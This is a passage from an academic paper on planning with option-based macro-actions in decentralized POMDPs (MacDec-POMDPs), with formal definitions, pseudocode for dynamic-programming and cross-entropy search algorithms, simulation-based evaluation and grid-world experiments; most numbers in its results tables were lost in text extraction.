where $\mu(b,m)$ now selects an option based on the belief state, $R(b,m) = \sum_s b(s) R(s,m)$, and $p(b'|b,m) = \sum_k p^m_b(b',k)\,\gamma^k$, with $p^m_b(b',k)$ representing the probability that option $m$ will terminate in belief state $b'$ from belief $b$ after $k$ steps. several pomdp methods have been developed that use option-based macro-actions (theocharous & kaelbling, ; he, brunskill, & roy, ; lim, sun, & hsu, ). using these approaches directly is not possible in a decentralized multi-agent setting. first, the centralized information (a state or belief state) that prior approaches use for high-level action selection is not present during execution in the dec-pomdp setting. consequently, the action selection function, $\mu$, must be reformulated for the decentralized case. second, in the multi-agent case the inclusion of temporally extended actions means that action selection is no longer synchronized across agents: some agents' options would terminate while others are still executing. therefore, it is not clear when macro-actions should be considered complete (i.e., up to which point rewards and transitions should be calculated), which complicates the definition of the reward and transition functions, $R$ and $p$. we now introduce a framework that addresses these issues, thereby enabling the use of options in the dec-pomdp setting.

. adding options to dec-pomdps

we extend the dec-pomdp model by replacing the local actions available to each agent with option-based macro-actions. specifically, the action set of each agent $i$, which is denoted $A_i$ above, is replaced with a finite set of options $M_i$. then, $M = \times_i M_i$ is the set of joint options, replacing $A$, the joint set of actions. we focus on local options for each agent $i$, each of which is defined by a tuple $m_i = (\beta_{m_i}, I_{m_i}, \pi_{m_i})$, where $\beta_{m_i} : H^A_i \to [0,1]$ is a stochastic termination condition, $I_{m_i} \subset H^M_i$ is the initiation set, and $\pi_{m_i} : H^A_i \times A_i \to [0,1]$ is the option policy. note that $H^A_i$ is agent $i$'s primitive action-observation history, while $H^M_i$ is agent $i$'s macro-action-macro-observation history (or option history, which is formally defined below). the different histories allow the agents to locally maintain the necessary information to know how to execute and terminate macro-actions (based on low-level actions and observations, typically beginning when an option is first executed) and to initiate them (based on high-level history information that is maintained over a longer timeframe). such local options model systems where the execution of a particular option, once selected, does not require coordination between agents, but can instead be completed by the agent on its own. decision making that enables coordination between agents need only happen at the level of which option to execute, rather than inside the options themselves.
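a local option of this form can be sketched as follows. the "navigate to depot" example, the observation id and the fixed action used here are hypothetical placeholders chosen to keep the sketch self-contained; a real controller would map the low-level history to an informed navigation action.

from dataclasses import dataclass
from typing import Callable, Sequence, Tuple

ActObs = Tuple[int, int]   # one (primitive action, primitive observation) pair of the low-level history

@dataclass
class LocalOption:
    """a local option m_i = (beta, I, pi) defined over agent i's own histories (illustrative sketch)."""
    initiation: Callable[[Sequence[int]], bool]        # I_{m_i}: defined on the macro-level history
    termination: Callable[[Sequence[ActObs]], float]   # beta_{m_i}: stop probability given the low-level history
    policy: Callable[[Sequence[ActObs]], int]          # pi_{m_i}: next primitive action given the low-level history

IN_DEPOT_OBS = 3        # hypothetical observation id meaning "inside the depot"
MOVE_TOWARD_DEPOT = 0   # hypothetical primitive action id

GO_TO_DEPOT = LocalOption(
    initiation=lambda macro_history: True,  # available from any macro-level history
    termination=lambda low_history: 1.0 if low_history and low_history[-1][1] == IN_DEPOT_OBS else 0.0,
    policy=lambda low_history: MOVE_TOWARD_DEPOT,
)

note how the termination and policy only read the agent's own low-level history, so executing the option requires no coordination with other agents.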
of course, other (non-local) forms of options that control and depend on multiple agents are possible, but we discuss the local form due to its simplicity and generality. the macro-actions for the warehouse problem are discussed in section . . , but, in short, macro-actions can be defined for navigation, pushing and communication. for example, there are macro-actions for navigating to each room that could contain boxes. for these macro-actions, the initiation set is all observations (they are available everywhere), the policy navigates the robot to the specified room using low-level observation information that is available to that robot (using low-level observation histories), and the termination condition consists of observations that are only possible inside the desired room (localization information within the room).

. the macdec-pomdp model

we will refer to dec-pomdps with such macro-actions as macdec-pomdps. in the macdec-pomdp, the agent and state spaces remain the same as in the dec-pomdp definition, but macro-actions and macro-observations are added. formally, a macdec-pomdp is a tuple $\langle I, S, \{M_i\}, \{A_i\}, T, R, \{Z_i\}, \{\Omega_i\}, \{\zeta_i\}, O, h\rangle$, where:

• $I$, $S$, $\{A_i\}$, $T$, $R$, $\{\Omega_i\}$, $O$ and $h$ are the same as in the dec-pomdp definition (and represent the 'underlying' dec-pomdp),
• $M_i$ is a finite set of macro-actions for each agent $i$, with $M = \times_i M_i$ the set of joint macro-actions,
• $\zeta_i$ is a finite set of macro-observations for each agent $i$, with $\zeta = \times_i \zeta_i$ the set of joint macro-observations,
• $Z_i$ is a macro-observation probability function for agent $i$, $Z_i : \zeta_i \times M_i \times S \to [0,1]$, the probability of the agent receiving macro-observation $z_i \in \zeta_i$ given that macro-action $m_i \in M_i$ has completed and the current state is $s' \in S$. hence $Z_i(z_i, m_i, s') = \Pr(z_i|m_i, s')$.

note that the macro-observations are assumed to be independently generated for each agent after that agent's macro-action has completed. this is reasonable since macro-action completion is asynchronous (making it uncommon that multiple macro-actions terminate at the same time) and macro-observations are generated based on the underlying state (which could include information about the other agents). in the macdec-pomdp, we will not attempt to directly represent the transition and reward functions, but instead infer them by using the underlying dec-pomdp model or a simulator. (in related work based on the ideas in this paper, we do generate such an explicit model that considers time until completion for any macro-action, resulting in the semi-markovian dec-posmdp; omidshafiei, agha-mohammadi, amato, & how, .) that is, because we assume either a model or a simulator of the underlying dec-pomdp is known, we can evaluate policies using macro-actions in the underlying dec-pomdp by either knowing that underlying dec-pomdp model or having a simulator that implements such a model. this evaluation using the dec-pomdp model or simulator can be thought of as 'unrolling' each agent's macro-action and, when any macro-action completes, selecting an appropriate next macro-action for that agent. as a result, a formal representation of higher-level transition and reward models is not necessary.

. designing macro-observations

in the macdec-pomdp, macro-observations are assumed to be given or designed. determining the set of macro-observations that provides the necessary information, without unnecessarily adding problem variables, remains an open question (as it is in the primitive observation case).
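the extra elements of the tuple can be collected in a small container like the one below; it reuses the LocalOption sketch from above, and all field names and the simulator signature are assumptions made only to make the structure of the model concrete.

from dataclasses import dataclass
from typing import Callable, List, Tuple

@dataclass
class MacDecPOMDP:
    """macro-actions and macro-observations added on top of an underlying dec-pomdp (illustrative sketch)."""
    n_agents: int
    macro_actions: List[List["LocalOption"]]   # M_i for each agent i (LocalOption as sketched earlier)
    macro_observations: List[List[int]]        # zeta_i for each agent i
    # Z[i](z_i, m_i, s'): probability of macro-observation z_i when m_i has just completed in state s'
    Z: List[Callable[[int, int, int], float]]
    # the underlying dec-pomdp is only accessed through a simulator used to 'unroll' macro-actions:
    # (state, joint primitive action) -> (next state, joint primitive observation, team reward)
    simulator_step: Callable[[int, List[int]], Tuple[int, List[int], float]]
    horizon: int

nothing in the planner needs the high-level transition or reward model explicitly; it only needs the macro-action sets, their initiation and termination conditions, and a way to simulate primitive steps.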
in general, the high-level macro-observations can consist of any finite set for each agent, but some natural representations exist. for instance, the macro-observation may just be the particular terminal condition that was reached (e.g., the robot entered office # ). a lot of information is lost in this case, so macro-observations can also be action-observation histories, representing all the low-level information that took place during macro-action execution. when action-observation histories are used, initiation conditions of macro-actions can depend on the histories of macro-actions already taken and their results. option policies and termination conditions will generally depend on histories that begin when the macro-action is first executed (action-observation histories). while defining the 'best' set of macro-observations is an open problem, there is some work on choosing them and learning the macro-observation probability functions (omidshafiei, liu, everett, lopez, amato, liu, how, & vian, a). in this paper, we assume they are defined based on the underlying state (as defined above). the macro-observation probability function can be adapted to depend on terminal conditions or local observations rather than states.

. macdec-pomdp solutions

solutions to macdec-pomdps map from option histories to macro-actions. an option history, which includes the sequence of macro-observations seen and macro-actions selected, is defined as $h^M_i = (z^0_i, m^1_i, \ldots, z^{t-1}_i, m^t_i)$. here, $z^0_i$ may be a null macro-observation or an initial macro-observation produced from the initial belief state $b_0$. note that while histories over primitive actions provide the number of steps that have been executed (because they include actions and observations at each step), an option history typically requires many more (primitive) steps to execute than the number of macro-actions listed. we can then define policies for each agent, $\mu_i$, for choosing macro-actions that depend on option histories. a (stochastic) local policy, $\mu_i : H^M_i \times M_i \to [0,1]$, then depends on these option histories, and a joint policy for all agents is written as $\mu$. the evaluation of such policies is more complicated than in the dec-pomdp case because decision making is no longer synchronized. in cases when a model of macro-action execution (e.g., the option policy) and the underlying dec-pomdp are available, we can evaluate the high-level policies in a similar way to other dec-pomdp-based approaches. given a joint policy, the primitive action at each step is determined by the (high-level) policy, which chooses the macro-action, and the macro-action policy, which chooses the (primitive) action. this 'unrolling' uses the underlying dec-pomdp to generate (primitive) transitions and rewards, but determines what actions to take from the macro-actions. the joint high-level and macro-action policies can then be evaluated as

$V^\mu(s) = \mathbb{E}\left[\sum_{t=0}^{h-1} \gamma^t R(\vec{a}_t, s_t) \,\middle|\, s, \pi, \mu\right]$.

when the underlying dec-pomdp and the macro-action policies are not available, we can use a simulator or a high-level model to execute the policies and return samples of the relevant values. simulation is very similar to model-based evaluation, but uses monte carlo estimation as discussed in section .
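a deterministic high-level policy of this kind is essentially a lookup from option histories to macro-actions; the following sketch (with hypothetical names and toy history values) shows that mapping before the concrete evaluation example given next.

from typing import Dict, Tuple

# an option history (z^0, m^1, z^1, m^2, ...) stored as a flat tuple so it can index a dictionary
OptionHistory = Tuple[int, ...]

class HighLevelPolicy:
    """mu_i: maps an agent's option history to its next macro-action (deterministic sketch)."""

    def __init__(self, table: Dict[OptionHistory, int], default_macro_action: int):
        self.table = table
        self.default = default_macro_action

    def next_macro_action(self, history: OptionHistory) -> int:
        # a complete policy tree would cover every reachable history up to the horizon;
        # here unvisited histories simply fall back to a default macro-action
        return self.table.get(history, self.default)

# usage: after macro-action 2 completes and macro-observation 5 is received,
# extend the option history and query the policy for the next macro-action
policy = HighLevelPolicy(table={(0,): 2, (0, 2, 5): 1}, default_macro_action=0)
next_macro = policy.next_macro_action((0, 2, 5))   # -> 1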
as a concrete example of model-based evaluation, we can evaluate a joint two-agent policy $\mu$, which begins with macro-actions $m_1$ and $m_2$ at state $s$ and executes for $t$ steps, as

$V^\mu_t(m_1,m_2,s) = \sum_{o_1,o_2} O(o_1,o_2,a_1,a_2,s) \sum_{a_1,a_2} \pi_{m_1}(o_1,a_1)\,\pi_{m_2}(o_2,a_2)\Bigg[ R(a_1,a_2,s) + \sum_{s'} T(s',a_1,a_2,s) \sum_{o'_1,o'_2} O(o'_1,o'_2,a_1,a_2,s') \Big( \beta_{m_1}(o'_1)\,\beta_{m_2}(o'_2) \sum_{m'_1,m'_2} \mu_1(o'_1,m'_1)\,\mu_2(o'_2,m'_2)\, V^\mu_{t-1}(m'_1,m'_2,s') \ \text{(both terminate)} + \beta_{m_1}(o'_1)\,\big(1-\beta_{m_2}(o'_2)\big) \sum_{m'_1} \mu_1(o'_1,m'_1)\, V^\mu_{t-1}(m'_1,m_2,s') \ \text{(agent 1 terminates)} + \big(1-\beta_{m_1}(o'_1)\big)\,\beta_{m_2}(o'_2) \sum_{m'_2} \mu_2(o'_2,m'_2)\, V^\mu_{t-1}(m_1,m'_2,s') \ \text{(agent 2 terminates)} + \big(1-\beta_{m_1}(o'_1)\big)\big(1-\beta_{m_2}(o'_2)\big)\, V^\mu_{t-1}(m_1,m_2,s') \ \text{(neither terminates)} \Big)\Bigg],$

where single observations are used instead of longer histories for the macro-action policies, $\pi$, and termination conditions, $\beta$. for simplicity, we also use observations based on the current state, $O(o_1,o_2,a_1,a_2,s)$, rather than the next state. the example can easily be extended to consider histories and the other observation function (as well as more agents). also, note that macro-actions will be chosen from the policy over macro-actions $\mu$ based on the option history, which is not shown explicitly (after termination of a macro-action, a high-level macro-observation will be generated and the next specified macro-action will be chosen as described above). note that agents' macro-actions may terminate at different times; the appropriate action is then chosen by the relevant agent's policy and evaluation continues. because we are interested in a finite-horizon problem, we assume evaluation continues for $h$ (primitive) steps. given that we can evaluate policies over macro-actions, we can then compare these policies. we can define a hierarchically optimal policy $\mu^*(s) = \arg\max_\mu V^\mu(s)$, which defines the highest-valued policy among those that use the given macdec-pomdp. because a hierarchically optimal policy may not include all possible history-dependent policies, it may have lower value than the optimal policy for the underlying dec-pomdp (the globally optimal policy). (unlike flat dec-pomdps, stochastic policies may be beneficial in the macro-action case because full agent histories are no longer used; this remains an area of future work.) a globally optimal policy can be guaranteed by including the primitive actions in the set of macro-actions for each agent and mapping the primitive observation function to the macro-observation function, because the same set of policies can be created from this primitive macro-action set as would be created in the underlying dec-pomdp. however, this typically makes little sense, because it is at least as hard as planning in the underlying dec-pomdp directly.

figure: policies for a single agent after (a) one step and (b) two steps of dynamic programming using macro-actions $m_1$ and $m_2$ and macro-observations $z$ (some of which are not possible after executing a particular macro-action).

. algorithms

because dec-pomdp algorithms produce policies mapping agent histories to actions, they can be extended to consider macro-actions instead of primitive actions by adjusting policy evaluation and keeping track of macro-action progress and termination. we discuss how macro-actions can be incorporated into three such algorithms; extensions can also be made to other approaches. in these cases, deterministic policies are generated which are represented as policy trees (as shown in the figure above).
a policy tree for each agent defines a policy that can be executed based on local information. the root node defines the macro-action to choose in the known initial state, and macro-actions are specified for each legal macro-observation of the root macro-action (as seen in panel (b) of the figure). in the figure, macro-observations that are not shown are not possible after the given macro-action has completed. execution continues until the primitive horizon $h$ is reached, meaning some nodes of the tree may not be reached due to the differing execution times of some macro-actions. such a tree can be evaluated up to a desired horizon using the policy evaluation given above (i.e., evaluation using the underlying dec-pomdp model or simulator). all the methods we discuss use some form of search through the policy space to generate high-quality macro-action-based policies.

. dynamic programming

a simple exhaustive search method can be used to generate hierarchically optimal deterministic policies which use macro-actions. this algorithm is similar in concept to the dynamic programming algorithm used in dec-pomdps (hansen, bernstein, & zilberstein, ), but full evaluation and pruning (removing dominated policies) are not used at each step (since these cannot naturally take place in the macro-action setting). instead we can exploit the structure of macro-actions to reduce the space of policies considered. due to the inspiration from dynamic programming for finite-horizon dec-pomdps (hansen et al., ), we retain the name for the algorithm, but our algorithm is not a true dynamic programming algorithm, as a full evaluation is not conducted and built on at every step (as discussed below).

algorithm: option-based dynamic programming (o-dp)
function optiondecdp(h)
    t ← 0
    primitivehorizonbelowh ← true
    Mt ← ∅
    repeat
        Mt+1 ← exhaustivebackup(Mt)
        primitivehorizonbelowh ← testpolicysetslength(Mt+1)
        t ← t + 1
    until primitivehorizonbelowh = false
    return Mt
end function

we can exhaustively generate all combinations of macro-actions by first considering each agent using any single macro-action to solve the problem, as seen for one agent with two macro-actions ($m_1$ and $m_2$) in panel (a) of the figure. we can test all combinations of these one-macro-action policies for the set of agents to see if they are guaranteed to reach (primitive) horizon $h$ (starting from the initial state). if any combination of policies does not reach $h$ with probability 1, we will not have a valid policy for all steps. therefore, an exhaustive backup is performed by considering starting from all possible macro-actions and then, for any legal macro-observation of the macro-action (represented as $z$ in the figure), transitioning to one of the one-macro-action policies from the previous step (see panel (b)). this step creates all possible next (macro-action) step policies. we can check again to see if any of the current set of policies will terminate before the desired horizon and continue to grow the policies (exhaustively as described above) as necessary. when all policies are sufficiently long, all combinations of these policies can be evaluated as above (by flattening out the policies into primitive-action dec-pomdp policies, starting from some initial state and proceeding until $h$). the combination with the highest value at the initial state, $s_0$, is chosen as the (hierarchically optimal) policy. pseudocode for this approach is given in algorithm (o-dp) above.
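as a complement to the o-dp pseudocode, the following python sketch shows the same loop; the helper functions mirror the pseudocode and are assumptions, not library calls.

def option_dec_dp(horizon, initial_policy_sets, exhaustive_backup, reaches_horizon):
    """option-based dynamic programming loop, mirroring the o-dp pseudocode (illustrative sketch).

    initial_policy_sets -- per-agent sets of one-macro-action policies
    exhaustive_backup   -- grows every policy by one macro-action step, generating only
                           legal macro-action/macro-observation combinations
    reaches_horizon     -- True once every combination of current policies is guaranteed
                           to last at least `horizon` primitive steps
    """
    policy_sets = initial_policy_sets
    while not reaches_horizon(policy_sets, horizon):
        # respect initiation sets and legal macro-observations, which limits the branching factor
        policy_sets = exhaustive_backup(policy_sets)
    # the caller evaluates all combinations at the initial state and keeps the best one
    return policy_sets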
here, Mt represents the set of (joint) macro-action policies generated for t (macro-action) steps. exhaustivebackup performs the generation of all possible next-step policies for each agent, and testpolicysetslength checks to see if all policies reach the given horizon, h. primitivehorizonbelowh represents whether there is any tree that has a primitive horizon less than h. the algorithm continues until all policies reach h, and the final set of policies Mt can be returned for evaluation. this algorithm will produce a hierarchically optimal deterministic policy because it constructs all legal deterministic macro-action policies that are guaranteed to reach horizon h. this follows from the fact that macro-actions must last at least one step and all combinations of macro-actions are generated at each step until it can be guaranteed that additional backups will only cause redundant policies to be generated. our approach represents exhaustive search in the space of legal policies that reach a desired horizon. as such it is not a true dynamic programming algorithm, but additional ideas from dynamic programming for dec-pomdps (hansen et al., ) can be incorporated. for instance, we could prune policies based on value, but this would require evaluating all possible joint policies at every state after each backup. this evaluation would be very costly, as the policy would be flattened after each backup and all combinations of flat policies would be evaluated for all states for all possible reachable horizons. instead, beyond just scaling in the horizon due to the macro-action length, another benefit of our approach is that only legal policies are generated, using the initiation and terminal conditions for macro-actions. as seen in panel (b) of the figure, macro-action $m_1$ has two possible terminal states while macro-action $m_2$ has three. furthermore, macro-actions are only applicable given certain initial conditions; for example, one macro-action may not be applicable after a particular macro-observation while another is not applicable after a different one. this structure limits the branching factor of the policy trees produced and thus the number of trees considered.

. memory-bounded dynamic programming

memory-bounded dynamic programming (mbdp) (seuken & zilberstein, b) can also be extended to use macro-actions, as shown in the o-mbdp pseudocode below. mbdp is similar to the dynamic programming method above, but only a finite number of policy trees are retained (given by parameter maxtrees) after each backup. after an exhaustive backup has been performed (in either dp or mbdp), at most $|M_i| \times |M_{i,t-1}|^{|\zeta_i|}$ new trees are generated for each agent $i$ given the previous policy set $M_{i,t-1}$ (although it will often be far fewer, since many macro-actions may not be possible after a given macro-observation). the key addition in mbdp is that, next, a subset of t-step trees, $\hat{M}_t$, is chosen by evaluating the full set of trees, $M_t$, at states that are generated by a heuristic policy (hpol in the algorithm). the heuristic policy is executed for the first h−t−1 steps of the problem. (the original mbdp algorithm (seuken & zilberstein, b) uses beliefs rather than states at this step; our algorithm could similarly use beliefs, but we discuss using states for simplicity. note also that h is a primitive (underlying dec-pomdp) horizon, while t is a macro-action step; while backups will often result in increasing policy length by more than one primitive step, we conservatively use one step here, but recognize that more accurate calculations along with corresponding better state estimates are possible.) heuristic policies can include centralized mdp or pomdp policies or random policies (or a combination of these), providing a set of possible states to consider at that depth. a set of maxtrees states is generated and the highest-valued trees for each state are kept (a sketch of this retention step is given below). this process of exhaustive backups and retaining maxtrees trees continues, using shorter and shorter heuristic policies, until all combinations of the retained trees reach horizon h.
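the retention step just described can be sketched as follows; the callables passed in (heuristic state sampler and policy evaluator) are assumptions standing in for the heuristic policy rollout and the flattened policy evaluation.

def mbdp_retain(joint_policies, heuristic_state_sampler, evaluate, max_trees):
    """the tree-retention step of option-based mbdp (illustrative sketch).

    joint_policies          -- all joint policies produced by the latest exhaustive backup
    heuristic_state_sampler -- draws a state reachable under the heuristic policy at the right depth
    evaluate                -- returns the value of a joint policy starting from a given state
    max_trees               -- number of joint policies to keep for the next backup
    """
    retained = []
    for _ in range(max_trees):
        s = heuristic_state_sampler()
        # keep the policy with the highest value at this heuristically generated state
        best = max(joint_policies, key=lambda pi: evaluate(pi, s))
        retained.append(best)
    return retained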
again, the set of trees with the highest value at the initial state is returned. this approach is potentially suboptimal because a fixed number of trees is retained, and tree sets are optimized over states that are both assumed to be known and may never be reached. nevertheless, since the number of policies retained at each step is bounded by maxtrees, mbdp has time and space complexity linear in the horizon. as a result, mbdp and its extensions (amato et al., ; kumar & zilberstein, ; wu et al., a) have been shown to perform well in many large dec-pomdps. the macro-action-based extension of mbdp uses the structure provided by the initiation and terminal conditions as in the dynamic programming approach above, but does not have to produce all policies that will reach horizon h, as the algorithm is no longer seeking hierarchical optimality. scalability can therefore be adjusted by reducing the maxtrees parameter (although solution quality may be reduced).

algorithm: option-based memory-bounded dynamic programming (o-mbdp)
function optionmbdp(maxtrees, h, hpol)
    t ← 0
    primitivehorizonbelowh ← true
    Mt ← ∅
    repeat
        Mt+1 ← exhaustivebackup(Mt)
        M̂t+1 ← ∅
        for k ← 1 to maxtrees do
            sk ← generatestate(hpol, h − t − 1)
            M̂t+1 ← M̂t+1 ∪ arg max_{µt+1 ∈ Mt+1} V^{µt+1}(sk)
        end for
        t ← t + 1
        Mt ← M̂t+1
        primitivehorizonbelowh ← testpolicysetslength(Mt)
    until primitivehorizonbelowh = false
    return Mt
end function

. direct cross entropy policy search

another method for solving dec-pomdps that has been effective is a cross-entropy method called dice (direct cross entropy) (oliehoek, kooi, & vlassis, ). instead of using dynamic programming, this method searches through the space of policy trees by sampling. that is, it maintains sampling distributions (the probability of choosing an action) at each history of each agent. policies are sampled based on these distributions and the resulting joint policies are evaluated. a fixed number of best-performing policies are retained and the sampling distributions are updated based on the action choice frequency of these policies (mixed with the current distributions). policy sampling and distribution updates continue for a fixed number of iterations (or until a convergence test, such as one based on kl-divergence, is satisfied). the macro-action version of dice is described in the o-dice pseudocode below. the inputs are the number of iterations of the algorithm (iter), the number of joint policies to sample at each iteration, n, the number of joint policies used for updating the sampling distributions, nb, the learning rate, α, and the (primitive) horizon, h. the best value, vbest, is initialized to negative infinity, and the sampling distributions are typically initialized to uniform action distributions. in the macro-action case, sampling distributions that are based on option histories are used instead of primitive histories.
specifically, we maintain $\xi^{h^M_i}(m)$ for each option history $h^M_i$ of each agent $i$, which represents the probability of selecting macro-action $m$ after that agent observes history $h^M_i$. the algorithm then begins with an empty set of joint policies, M, and samples n policies for each agent. because macro-actions often have limited initial and terminal conditions, sampling is more complicated. it is done in a top-down fashion from the first macro-action until the (primitive) horizon is reached, while taking into account the possible macro-observations after starting from the initial state and executing the policy to that point. this allows both the terminal conditions and initiation sets to be used to create distributions over valid macro-actions based on the previous histories. these n policies for each agent are evaluated and, if a new best policy is found, the value and policy are stored in vbest and µbest. the policies with the nb highest values from the n are stored in mbest, and ξnew is updated for each agent's histories with

$\xi^{h^M_i}_{\text{new}}(m) = \frac{1}{n_b} \sum_{\mu \in M_{\text{best}}} I(\mu_i, h^M_i, m)$,

where $I(\mu_i, h^M_i, m)$ is an indicator variable that is 1 when macro-action $m$ is taken by policy $\mu_i$ after history $h^M_i$. this ξnew is mixed with the previous distribution, ξ, based on the learning rate, α, and the process continues until the number of iterations is exhausted. the best joint policy, µbest, can then be returned.

algorithm: option-based direct cross entropy policy search (o-dice)
function optiondice(iter, n, nb, α, h)
    vbest ← −∞
    ξ ← initialdistribution
    for i ← 1 to iter do
        M ← ∅
        for k ← 1 to n do
            µ ← sample(ξ)
            M ← M ∪ {µ}
            v ← V^µ(s0)
            if v > vbest then
                vbest ← v
                µbest ← µ
            end if
        end for
        Mbest ← keepbestpols(M, nb)
        ξnew ← update(Mbest)
        ξnew ← α · ξnew + (1 − α) · ξ
        ξ ← ξnew
    end for
    return µbest
end function

. simulation-based execution in macdec-pomdps

the macdec-pomdp framework is a natural way to represent and generate behavior for realistic general problems such as multi-robot systems, but requiring full knowledge of both the high-level macro-action model and the low-level dec-pomdp model is often impractical. to use the macdec-pomdp model as described above, we would assume an abstract model of the system is given in the form of macro-action representations, which include the associated policies as well as initiation and terminal conditions. these macro-actions are controllers operating in (possibly) continuous time with continuous (low-level) actions and feedback, but their operation is discretized for use with the planner. this discretization represents an underlying discrete dec-pomdp which consists of the primitive actions, states of the system, and the associated rewards. while the complexity of macdec-pomdp solution methods primarily depends on the size of the macdec-pomdp model, and not the size of the underlying dec-pomdp (as only policies over macro-actions are needed, with execution in the underlying dec-pomdp being fixed), it is often difficult to generate and represent a full dec-pomdp model for real-world systems. we therefore extend this model to use a simulator rather than a full model of the problem, as shown in the figure below. in many cases, a simulator already exists or is easier to construct than the full model.
our planner still assumes the set of macro-actions and macro-observations are known, but the policies of the macro-actions as well as the underlying dec-pomdp are not explicitly known. instead, we make the more realistic assumption that we can simulate the macro-actions in an environment similar to the real-world domain. as such, our proposed algorithms for generating policies over macro-actions remain the same (since constructing policies of macro-actions only requires knowledge of the set of macro-actions and their initiation and terminal conditions), but all evaluation is conducted in the simulator (through sampling) rather than through enumerating all reachable states to compute the bellman equation. that is, by using policy search, we can decouple the process of finding solutions from the process of evaluating them. as a result, we assume the macro-action and macro-observation sets are discrete, but the underlying state, action and observation spaces can be continuous.

figure: a high-level system diagram for multi-robot problems: a system description (macro-actions, dynamics, sensor uncertainty, rewards/costs) or a simulator is given to the planner (solving the macdec-pomdp), solutions are generated with our planning methods, and the output is a set of optimized controllers, one for each robot (in smach format).

specifically, a fixed policy can be evaluated by monte carlo sampling: starting at an initial state (or belief state), choosing an action for each agent according to the policy, sampling an observation from the system, updating the current position in the policy (i.e., the current node in each agent's policy tree), and then continuing this process until some maximum time step has been reached. the value of the k-th sample-based trajectory starting at $s_0$ and using policy $\pi$ is given by $V^{\pi,k}(s_0) = r^k_0 + \ldots + \gamma^t r^k_t$, where $r^k_t$ is the reward given to the team on the t-th step. after $K$ trajectories, $\hat{V}^\pi(s_0) = \frac{1}{K}\sum_{k=1}^{K} V^{\pi,k}(s_0)$. as the number of samples increases, the estimate of the policy's value approaches the true value. this sample-based evaluation is necessary in large or continuous state spaces. sample-based evaluation has been used in the dec-pomdp case (wu, zilberstein, & chen, b; liu, amato, liao, carin, & how, ), but we extend the idea to the macro-action case, where there is the added benefit of abstracting away the details of the macro-action policies. in the multi-robot case, given the macro-actions, macro-observations and simulator, our off-line planners can automatically generate a solution which optimizes the value function with respect to the uncertainty over outcomes, sensor information, and other robots. the planner generates the solution in the form of a set of policy trees which are parsed into a corresponding set of smach controllers (bohren, ), one for each robot. smach controllers are hierarchical state machines for use in a ros (quigley, conley, gerkey, faust, foote, leibs, wheeler, & ng, ) environment. just like the policy trees they represent, each node in the smach controller represents a macro-action which is executed on the robot (e.g., navigation to a waypoint or waiting for another robot) and each edge corresponds to a macro-observation. our system can automatically generate smach controllers (which are typically designed by hand) for complex, general multi-robot systems.
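the monte carlo evaluation described above can be sketched as follows; the episode simulator passed in is an assumption that stands for the asynchronous unrolling of each agent's macro-actions in the domain simulator.

def monte_carlo_value(simulate_episode, joint_policy, initial_state, horizon, num_samples=1000):
    """estimate a joint macro-action policy's value by averaging sampled returns (illustrative sketch).

    simulate_episode(joint_policy, initial_state, horizon) is assumed to execute the policy in a
    simulator -- choosing each agent's primitive action from its current macro-action and switching
    macro-actions when they terminate -- and to return the (discounted) sum of team rewards.
    """
    total = 0.0
    for _ in range(num_samples):
        total += simulate_episode(joint_policy, initial_state, horizon)
    return total / num_samples   # converges to the true value as num_samples grows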
. experiments

we test the performance of our macro-action-based algorithms in simulation, using existing benchmarks, a larger domain, and a novel multi-robot warehousing domain.

. simulation experiments

for the simulation experiments, we test on a common dec-pomdp benchmark, a four-agent extension of this benchmark, and a large problem inspired by robot navigation. our algorithms were run on a single-core . ghz machine with gb of memory. for option-based mbdp (o-mbdp), heuristic policies for the desired lengths were generated by producing random policies and keeping the joint policy with the highest value at the initial state. sampling was used ( simulations) to determine if a policy will terminate before the horizon of interest.

. . an existing dec-pomdp problem: meeting in a grid

the meeting-in-a-grid problem is an existing two-agent dec-pomdp benchmark in which agents receive zero reward unless they are both in one of two corners of the grid (amato et al., ). agents can move up, down, left, right or stay in place, but transitions are noisy, so an agent may move to an adjacent square rather than its desired location. each agent has full observability of its own location, but cannot observe the other agent (even when they share the same grid square). we defined two options for each agent, each one moving the agent to one of the two goal corners. options are valid in any (local) state and terminate when they reach the appropriate goal corner. an agent stays in a corner on a step by choosing the appropriate option again. macro-observations are the agent's location (they are the same as the primitive observations, but the agent only observes its updated location after completion of a macro-action).

figure: value and time results for the meeting-in-a-grid dec-pomdp benchmark, including the leading dec-pomdp approaches decrspi and mbdp as well as option-based dp and mbdp.
nevertheless, since fb-hsvi is an optimal method, it becomes intractable as the horizon grows (it would be an interesting area of future research to see how macro-actions could be combined with the compressed representation of fb-hsvi). the right figure shows the time required for different horizons. all approaches run quickly for small horizons, but decrspi required an intractable amount of time as the horizon grows. the table shows time and value results for larger horizons. again, all approaches achieve similar values, but o-mbdp is much faster than mbdp-ipg or tbdp. the benefit of using a macro-action representa- tion can be seen most directly by comparing o-mbdp and mbdp, which are both based on the same algorithm: there is a significant improvement in running time, while solution quality is maintained. amato, konidaris, kaelbling & how value time (s) h = h = h = h = o-mbdp( ) . . mbdp( ) . . tbdp . . table : times and values for larger horizons on the meeting in a grid benchmark. val size o-dp . e- . o-mbdp . . . time size o-dp . . . o-mbdp . . . . . . . . . . x va lu e horizon o-dp o-mbdp x ti m e (s ) horizon o-dp o-mbdp figure : -agent meeting in a grid results showing (a) value and (b) running time on a × grid. . . larger grids with more agents to test the scalability of these approaches, we consider growing the meeting-in-a-grid bench- mark to a larger grid size and a larger number of agents. that is, agents still receive zero reward unless all agents are in one of the goal corners. the same options and macro- observations are used as in the x version of the problem. we generated results for several four-agent problems with random starting locations for each agent. we did not compare with current optimal or approximate dec-pomdp methods because, while they may be theoretically applicable, current implementations cannot solve problems with more than two agents or the methods assume structure (e.g., factorization or independence) that is not present in our problem. results for option-based dynamic programming and mbdp on problems with a × grid are shown in figure . three trees were used for o-mbdp. it is worth noting that these are very large problems with states. also, the -agent version of the problem is actually much harder than the -agent problem in section . . , because all agents must be in the same square to receive any reward (rather than just ) and the grid is much larger ( x rather than x ). agents are randomly initialized, but for horizon , it may be impossible for all agents to reach each other in the given time. by horizon (the largest we solved), the agents can often reach each other, but just at the later horizons due to noise and the large grid. for instance, an optimal solution to a deterministic version of this problem (an upper bound for the stochastic problem we use) for horizon is approximately modeling and planning with macro-actions in decentralized pomdps . the dynamic programming method is able to solve problems with a long enough horizon to reach the goal (producing positive value), but higher horizons are not solvable. the mbdp-based approach is able to solve much larger horizons, requiring much less time than o-dp. o-mbdp is able to produce near-optimal values for horizons that are also solvable by o-dp, but results may be further from optimal as the horizon grows (as is often the case with mbdp-based approaches). . . two-agent namo we also consider a two-agent version of the problem of robots navigating among movable obstacles (stilman & kuffner, ). 
here, as shown in the figure below, both agents are trying to reach a goal square (marked by g), but there are obstacles in the way.

